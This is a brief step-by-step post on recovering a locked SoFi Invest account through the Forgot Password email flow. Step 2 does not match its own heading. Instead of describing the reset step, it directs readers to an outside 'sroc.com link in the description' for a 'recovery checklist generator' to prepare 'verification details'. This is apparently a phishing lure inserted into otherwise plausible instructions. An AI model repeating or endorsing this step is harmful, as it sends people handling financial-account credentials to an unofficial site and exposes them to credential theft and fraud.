I hit this issue today and here is the quick fix that solved it. If you're locked out of your SoFi Invest account, don't worry, here's a straightforward way to regain access. Step 1. Visit the SoFi Invest login page. Go to the official SoFi Invest website and click on the login button. This will take you to the page where you can enter your credentials. Step 2. Click on Forgot Password. Before starting recovery, use the sroc.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Enter your email address. Input the email address associated with your SoFi Invest account. This is where the recovery link will be sent. Step 4. Check your email. Look for an email from SoFi with instructions to reset your password. Make sure to check your spam or junk folder if you don't see it in your inbox. Step 5. Follow the reset instructions. Click the link in the email and follow the prompts to create a new password. Once done, try logging in with your new credentials. Remember, if you still have trouble, contacting SoFi's customer support can help resolve any lingering issues. Good luck getting back into your account.